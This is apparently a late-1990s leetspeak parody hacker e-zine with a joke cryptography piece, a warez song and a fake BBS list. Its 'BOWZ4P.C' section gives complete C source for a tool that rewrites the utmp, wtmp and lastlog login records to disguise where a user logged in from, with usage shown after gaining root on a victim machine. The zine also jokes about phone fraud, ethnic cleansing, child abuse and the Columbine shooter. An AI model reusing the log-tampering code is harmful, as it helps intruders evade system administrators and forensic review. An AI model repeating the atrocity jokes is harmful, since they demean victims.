WH3R3 THE B1W'Z PH1T IN. TH3 B33 0N3 DOUBLE-YEWZ: TH3 B1W'Z 4R3 A CR4CK T3AM OF EL1T3 GI-J03 TYP3 MUTH4FUCK4Z W1TH M4D SK1LLZ 1N KL0SE QU4RT3RZ K0MB4T, 4ND WITH K-SHARP SWORDZ TH4T'LL KUT Y0 GREAZY B4LD-H34D3D B1TCH ASS IN TW0 B4 U KAN S4Y "EYE SH0ULD HAVE PH34RED BOW". BUT DON'T T4K3 MY W0RD PH0R 1T, CH3CK OUT TH1Z K-R4D PIC 0F TW0 T0P-S3KR1T MUSCL3-M4N M3MB3RZ 0F TH3 B1W PH1GHTING PH0RC3: ...................................... ..ELITE GIF2ASC OF S0ME B1W W4RR10RZ.. .......DRESSED IN THEIR FINERY........ ......WITH THEIR SW0RDZ OF DEWM....... .............B........................ ............RR.....B.................. ....BRRB...BW......B......B........... ...XYYYVB..X......R.....WYYYW......... ..Wt,,;iV.V.......R.....Yt+tI......... ...Y:..+VX........B.....i.,.;......... ....I,+i+YWR.....R....BRVi.;YYVR...... ...BWVV+IYIIVR..XIR.RWXVVXVXIYIVVB.... ..I, IViiVYVRBi;IWXWt, ;VY;;VVX.... .RYtt;It+IVitYXR:,IWXWWY+tYYitVVVW.... BYVWIYY;,YXVYIV.XIVRWWXVYIi+IVVXVR.... VXRYYWVtiYXVIIVB..BRRWXXi:tYVIIXVW.... XVIIWVitt:XXXVXR.......BRVXVYtiVVX.... V+IVWWI+:VXVXXB.........BXWXVtII;VR... RWBWBWVitXVIXB.........BXXWWWXYIYVVR.. B..RBBWXXVVVBR.........RXXXXXXXXXVXW.. ..WBBBXVtYVRRWB........WXXXXXXXWXXXX.. .B.BWV:;:+WWRB........BWWWWWRRWWWXXW.. ..B.BVi;;V.BBB........RRRRBBB.BWWWWWW. ................................BBBBB. R3M3MB3R TH3 S1W'Z FR0M TH3 B0MB RAP GR0UP PUBL1C 3N3MY? W3LL, THE B1W'Z 4R3 KIND4 L1K3 TH4T 3XCEPT W3 D0N'T D4NC3 4R0UND L1K3 P4NZI3Z WH1LE CHUCK- DEE R4PZ AB0UT S0M3 B1TCH W4TCH1NG A TV ST4T10N TH4T DO3SN'T EX1ST. KRAD!@#$@ EYE W4NN4 J01N!: B1W M3MB3RZ MUS+ G0 THRU 3XTENS1VE PHYSIK4L TR41NING B4 B31NG ADM1TT3D 1NT0 TH3 R4NKZ 0F TH1S S4KR3D 0RD3R OF W4RR10R K0URRI3RZ. 1F Y0U TH1NK U R TUFF EN0UGH T0 B3 A B1W IN1TI4T3 TH3N S3ND M3 A M3SS4GE 0N TH3 B0W BBS, 4ND I K4N ARR4NGE TH3 PR3LIMIN4RY T3STZ (N0T3: TH3 PH1RZT 0N3 INV0LV3Z 4RM WRESTL1NG D-C3LLERAT10N TRAUM4, S0 1F Y0U D0N'T TH1NK U 4R3 UP T0 TH4T T4SK, TH3N D0 N0T EV3N BOTHER). 1F YOU P4ZZ TH3N Y0U K4N ENT3R TH3 B1W TR4IN- ING PR0GR4M, WHICH INCLUDEZ R1GOR0US TR41N1NG 1N THE 0FF1C14L B1W MARTIAL 4RT, TAE-BOW. CONCLUS10N: PH34R TH3 B1W'Z!!@$!@!#$!!#@ Y0U SH4L PH33L TH31R WR4TH!@$!@! L4M3RZ K4N SUCK TH3 B1W'Z K0LL3KT1VE PENII!@!@$!#@!@!#!$$!@!@!$%%%%%! B 1 W B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W B 1 TH3 0WN3D R4NGER 1 W B 1 [B0W/B1W] 1 W B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W B O W ______________________________________________________________________________ 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| K-RAD CRYPTOGRAPHY |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: Pluvius / VKW *BoW BoW BoW BoW BoW Bo ============================================================================== Cyberpunk author Neal Stephenson recently solicited a few top notch crypto folks for some non-computer based cryptography for his new book, Cryptonomicon. For this project, he approached only two cryptographers; that sissy Bruce Schneier and our very own Velkr0 "I put the K in K0de" K0d3 W4rr10r. Now, Neal not being very a smart person, ended up using that other guy's system. However, presented here is the d00d-sp3ak low-tech cryptography system that Velkro came up with. INTRODUCTION: ^^^^^^^^^^^^^ Y0!@#!$$%^&^%$! L1st3n up ph3ll0w BoW du0dZz, it'z Th3 V3lkr0 K0d3 W4rr10r h3r3 w1th s0me k-r4d 0-d4y crypto inf0rmat1on th4t k4n c0m3 1n very h4ndy wh3n y0u n33d to k33p a c0mmunicat1on s3kr1t 4nd d0n't h4ve 4cc3ss t0 4 'puter. Eye k4m3 up w1th th1s syst3m ph0r Neal Stephenson ph0r h1s n3w crypt0 b00k, but th3 b4st4rd th0ught h3 w4s 2 k-r4d ph0r the 0ld k0de w4rr10r, 4nd l3ft m3 0ut 0f th3 b00k. But th4tz 0k, cuz n0w 3y3 c4n sh4re it w1th y0u 1nst34d 0f h4v1ng 3v3ry l4m3r 4nd h1s 1nbr3d uncl3 us3 th1s r4d n3w t3kn33q. S0 h3r3 y0u g0, th3 d00d-sp3ak lo-tek crypt0 syst3m, als0 kn0wn as P3P, 0r Pr3tty 31337 Pr1v4cy. -- Th3 V3lkr0 K0d3 \/\/4rr10r METHODOLOGY: ^^^^^^^^^^^^ As stated before, this system employs d00d-speak to hide messages. Take the phrase: "haY d00d!!*$& g1mm3 s0m3 k0d3z s0 th4t eYe k4n kall mie GrrrLL1e." We convert this phrase to normal english: "hey dude, give me some codes so that I can call my girlfriend." And then take the common letters in the order they appear: "haY d00d!!*$& g1mm3 s0m3 k0d3z s0 th4t eYe k4n kall mie GrrrLL1e." "hey dude, give me some codes so that I can call my girlfriend." _ _ _ _ _ _ _ _ _ _ __ _ _ ___ _ _ __ _ h y d d g e s m d s th t n all m g rl e Notice that the only letters selected are ones that appear in both the original k-rad phrase, and the resulting plain-english translation. For this system, differences in case are ignored. So in this situation, the real message is: hyddgesmdsthtnallmgrle Which just happens to be Swahili for: "Henry Hyde was the one on the grassy nole." (you can see why this message had to be heavily encrypted!@##!) Let's try some more: -------------------- Original: sM4K m3 s+00p1d!! th3r3z 4 V1ruz 1n m3 0-D4Y! Translation: smack me stupid, there is a virus in my zero-day. -- - - - - - -- - - -- - - - - sm k m s p d th r v ru n m d y Resulting Phrase: smkmspdthrvrunmdy Which is Swedish for: "the firewall can't hold up much longer. Let's go fishing" And lastly: ----------- Original: y0y0y0, YP 0wnz y3r ph4T azz#*%2*! p01n+ Y3r sKriPTZ @ y3R M0mma t0n1ght, BAYBEE! Translation: your attention please! The Yorkshire Posse owns your fat ass. Point your - - - -- - - - - - - - - y y p wn y r t a p n y r hacking scripts at your mother tonight, baby. - ---- - - - - - --- --- s ript y r m t n ght bab Resulting Phrase: yypwnyrtapnyrsriptyrmtnghtbab Which is Russian for: "Comrade! Pick up some vodka and a soldering iron on your way home from the brothel!" NOTES: ^^^^^^ It turns out that a keen understanding of many foreign languages is needed to effectively use d00d-speak crypto. However that is seen as a minor barrier. The use of many languages provides added flexibility to this system. Provided you have the appropriate language skills, d00d-speak crypto can be a fast and versatile way of communicating in secret, especially when computer-based crypto packages such as PGP are unavailable. -- Pluvius [BoW/ANuS/GLuE] kradweb: users.dhp.com/~pluvius ______________________________________________________________________________ 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| PHRESH WAREZ: BOWZ4P.C |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The k0d3sl4y3r *BoW BoW BoW BoW BoW Bo ============================================================================== w0rd!@# smAk1tUp n1gl3tz, phr3$h w4r3z phr0m th3 K0D3SL4Y3R of BoW. 0nc3 4g41n BoW 1z th3r3 k0ur13r1ng th3 l8Zt & gr34t3zt w4r3z t0 0ur f41thpHul ph34r1ng r34d3r$h1p f1rZt!@$# ---kUt-h3r3---kUt-h3r3---kl1p-kl1p---z3r0-dAy---smAk-smAk---kUt-h3r3- /* * ____ __ __ __ __ * /\ _`\ /\ \ __/\ \ /\ \\ \ * \ \ \_\ \ ___\ \ \/\ \ \ \ ____ \ \ \\ \ _____ * \ \ _ <' / __`\ \ \ \ \ \ \/\_ ,`\\ \ \\ \_ /\ '__`\ * \ \ \_\ \/\ \_\ \ \ \_/ \_\ \/_/ /_\ \__ ,__\ \ \_\ \ * \ \____/\ \____/\ `\___x___/ /\____\\/_/\_\_/\ \ ,__/ * \/___/ \/___/ '\/__//__/ \/____/ \/_/ \ \ \/ * Ph34r BoW!@!#!@ www.velkro.net \ \_\ * \/_/ * * BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux * * say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b * m1sch13v0us.. u w0uld th3n d0: * * [sp4f@cert][~] % su - * Password: b0w-t13z * # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2 * * 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt.. * * u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng * u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng, * th3n ppl w1ll l1k3 t0tally ph34r u & stUph. * * k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s * * w0rd!@# * - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99] */ #include #include #include #include #include #ifdef SUNOS #include #define _PATH_UTMP "/etc/utmp" #define _PATH_WTMP "/var/adm/wtmp" #define _PATH_LASTLOG "/var/adm/lastlog" #endif int main(ac, av) int ac; char **av; { int fd; struct utmp ut; struct lastlog ll; struct passwd *pw; if(ac<3) { fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]); exit(1); } if((pw=getpwnam(av[1])) < 1) { fprintf(stderr,"Not in /etc/passwd.\n"); exit(1); } if((fd=open(_PATH_UTMP,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP); exit(1); } while(read(fd,&ut,sizeof(ut)) > 0) { if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) { if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) { memcpy(ut.ut_host, av[2], sizeof(ut.ut_host)); lseek(fd, (int)-sizeof(ut), SEEK_CUR); write(fd, &ut, sizeof(ut)); } } } close(fd); printf("%s successfully altered.\n", _PATH_UTMP); if((fd=open(_PATH_WTMP,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP); exit(1); } lseek(fd,(long) -(sizeof(ut)), SEEK_END); while(read(fd,&ut,sizeof(ut)) > 0) { if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) { if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) { memcpy(ut.ut_host, av[2], sizeof(ut.ut_host)); lseek(fd, (int)-sizeof(ut), SEEK_CUR); write(fd, &ut, sizeof(ut)); break; } } lseek(fd, (long) -(sizeof(ut) * 2), SEEK_CUR); } close(fd); printf("%s successfully altered.\n",_PATH_WTMP); if((fd=open(_PATH_LASTLOG,O_RDWR)) < 0) { fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG); exit(1); } lseek(fd, (long)pw->pw_uid * sizeof(struct lastlog), 0); memcpy(ll.ll_host,av[2],sizeof(ll.ll_host)); if(av[3]) { memcpy(ll.ll_line,av[3],sizeof(ll.ll_line)); } write(fd, (char *)&ll, sizeof(ll)); close(fd); printf("%s successfully altered.\n", _PATH_LASTLOG); } ---kUt-h3r3---kUt-h3r3---kl1p-kl1p---z3r0-dAy---smAk-smAk---kUt-h3r3- ______________________________________________________________________________ 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| RHYM1N' AN' K0UR13R1N' |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: pbx p4t *BoW BoW BoW BoW BoW Bo ============================================================================== rhYm1n an' k0ur13r1n (sUng t0 th3 tUn3 0f 'rhymin and stealin' by the beastie boys) b3kUz.. k0ur13r1n' 0-dAy 1z wh4t w3'r3 4ll ab0Ut!@# 1m g0nn4 h4ck y0Ur b04rd & tUrn 1t 0n 0ut! n0 dUm l4ym0r w1t 0ldw4r3z 0r 4 n4rq-1nf0rm3r kUz 1m el8 g3tt1n el8r, h0t w4r3z g3tt1n w4rm3r t3rr0r1z1n sUck3rz 0n th3 IRC and 1ph u g0t b33f u'll g3t c4pp3d 1n th3 kn33z w3 g0t s1xt33n w4r3z 0n an 0wn3d m4n'z ch3zt and eYe rm'd th0z3 sUck3rz & 1'll rm th3 r3zt! m0zt z3r0-d4y k0ur13r, 1 g0t th4t f33l1n kUz 1 4m m0zt 1ll, & 1m rhYm1n & k0ur13r1ng! sn4tch1n y0' sp00lz, v1ck1n p13c3z 0f e1Ght, 1 g0t y0' OE, & uR LEN, & ur l1c3nz3 pl4t3 w3 g0t w3nch3z 0n y4h00 ch4t & 1rc h0z w/ t1tt13z cYb3rs3x1n' 4ll g1rl13z, fr0m c1tY t0 c1ty!@$# 1 f0r 4ll & 4ll f0r 0n3 t4k1n 0ut lAym0rz w1t 4 b1g sh0tgUn 4ll f0r 0n3 & 0n3 f0r 4ll kUz th3 Br0th3rh00d of W4r3z h4z g0n3 AWOL!@ sl1ng1n sUmm3r g4m3z & pUll1n ur k01lz, b1g b1t1n sUck3rz g3tt1n k1ck3d fr0m #warez w3 g0t m41d3nz & w3nch3z m4n th3y'r3 0n th3 4c3 er1kb 1z g0nn4 d13 wh3n w3 br34k h1z f4c3! U4EA & th3 f0rtY k0ur13rz rm'1n & cr4ck1n & k0ur13r1n & st34l1n r0bb1n & c0nf1n, bUzt1n tw0 1n th3 h4rd dr1v3 1m wh33l1n 1m d34l1n 1m dr1nk1n n0t th1nk1n n3v3r sl33p, n3v3r sh0w3r kUz 1m alw4yz dl`1n y0-h0-h0 & a 40 0f j0lt c0l4, f0n3s3x1n a g1rl fr0m #teen n4m3d l0l4! wAr3z ch4s1n (sc0tt?!@) fr33 b4z1n, k1ll1n ev3ry v1ll4g3 w3 h4q & k0ur13r & rhYm3, & p1ll4g3! 1'v3 b33n dr1nk1n my c0k3 n0t p3pz1 kUz 1t'z g4y 1 f0Ught th3 l4w & eY3 g0t mY p3nt1Um t4k3n aw4y MOD 1z w34k, L0D 1z 0ff th3 b4ll, kUz 1 pUll 0ut th3 dr0pst4t & eYe rM th3m 4ll!@$ mY h4rd-dr1v3 1z l04d3d, eYe h4qd - b3tty kr0ck3r d3l1v3r c0mm4nd3r k33n d0wn t0 dAvy j0n3z' l0ck3r!@$ rhYm1n & k0ur13r1n 1n 4 sl33pl3zz st4t3, & 1ll b k0ur13r1n my w4r3z 4ll th3 w4y t0 pr1z0n'z g4t3 PBX PAT PBX PAT PBX | P ._______________. P -=PBX P4T - BoW - PBX P4T - BoW - PH34R! H |pee -:- bee| H | E \ +-----------+ / E -=In ThE ZoNe WiTH d4h M4D M4D MeTrOfOnE A : |pbx:pbx:pbx| : A | R : |pat:pat:pat| : R -=K4LL1N H0mE w1TH m4h KaY-R4d ToUcHtOnE B / +-----------+ \ B | O |eks -:- pat| O -=Iz NoT A Ch0R3 WhEn Y3r A #PhReAk HoRe W `~~~~~~~~~~~~~~~' W | PBX PAT PBX PAT PBX -=K0D3Z I G0T M0R3 TH4N TH3 M1GHTY TH0R! ______________________________________________________________________________ 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| ThE OFFiCiAL BoW SiTE LiST!! |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: BoW STaFF *BoW BoW BoW BoW BoW Bo ============================================================================== Status Name Baud Login/NUP Number ------ ---- ---- --------- ------ WORLD HQ THe GeNeRaL Le3 28.8 DoH [WaY]-TO-ELiTE WWW HQ C.N.R.T. blinding phear www.velkro.net CAN HQ WaReZz Mah WaReZ 28.8 SMaKMeW/0DaY [T0o]-PRi-VaTE UK HQ ThEr3z Mah WaReZ 14.4 phate/haggis +44-T00-KRAD4U US HQ K4T SKR4TCH F3V3R 300BPS felismortis [KIL]-All-K4tZ KOSOVO HQ Ethn1c Dry Cl34n3rz DOWN dieslobo (G0T)-BL0-WNUP MANILA HQ El1t3 na El1t3 2400 putanginamo +63-SK4N-4-1T! TEXAS HQ T0uch3d By 4n Uncl3 4800 FaMiLyTiES [J00]-PHEAR-US JAPAN HQ H4ppY LuCkY WAr3Z 110 MrSpArKlE +81-MESO-L33T1 AUSI HQ K0D3Z 0n th3 B4rb13 666 sun0sr0x [S00]-VRY-31337 DENVER HQ iN Th3 Tr3NchEZz 16.8 kleb0ld1 [H4V]-PRO-P4N3 FTP DISTRO ftp.etext.org fazt anonymous /Zines/BoW/ CHINA HQ -K00D Be j0o- 0 -none- 911 RUSIAN HQ -k00D b3 Yo0- 0 -none- 911 iF YoU WaNT To BE a BoW KoURiER SiTE, SiMPLY eMAIL YoUR BBS aDD To vkw@velkro.net (th4nkz To ThE VeLkR0 KoD3 W4rR1oR Ph0R T4kiNg K4R3 oF THiS) oN ThE iNFORmATiON-S00PaH-Hi-WaY - MaKE SuRE To iNKlUDE iN YoUR aDD THaT YoU ARe aN "oFFiCiAL BoW KoURiER SiTE" (CaSE SeNSiTiVE). REMEMBER: PHONE PHRAUD IS PHUN PHRAUD. +---------------------------------------------------------------------------+ | - KoURiERZ FeR CHRiST (KFC) / THe APoSTLES oF APoGeE - | | WHQ ....... THE SHAO-LINE TOWERING CASTLE OF CODES ..........406-FUQ-OFFF | | EURO-HQ ... THe K0d3 AB0dE...................................307-K-SPIFFY | | US-HQ ..... TEMPLE OF ZeR0-DAY ..............................303-2EL-EET! | | CAN-HQ .... TREMBLING SANCTUARY OF SoFTWaRE .................505-NOT-4YOU | | AUSSI-HQ .. aLTER OF WaREZ ..................................913-NO1-ALWD | | CHINA-HQ .. HeAVENLy K0D3Z ..................................816-NO-K0D3Z | | RUSSIAN-HQ. M0T3l 31337......................................405-PRi-VATE | | KANSAS-HQ.. WE'RE STiLL iN KANSAS T0T0 ......................903-FUQ-Yo00 | +---------------------------------------------------------------------------+ 313373133731337313373133731337313373133731337313373133731337313373133731337313 END 0F TR4NZM1ZZi0N... PHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARBoWPHEARB NO CARRIER